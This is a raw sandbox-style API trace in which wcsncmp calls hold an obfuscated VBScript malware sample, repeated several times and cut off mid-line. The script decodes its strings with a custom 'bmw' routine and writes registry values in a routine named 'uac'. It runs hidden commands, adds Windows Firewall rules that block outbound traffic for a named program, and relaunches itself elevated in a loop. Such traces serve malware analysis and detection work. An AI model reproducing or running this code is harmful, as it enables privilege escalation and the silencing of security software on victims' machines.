bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.946] wcsncmp (_String1=" > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.946] wcsncmp (_String1="> 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 49 [0222.946] wcsncmp (_String1=" 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.946] wcsncmp (_String1="0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 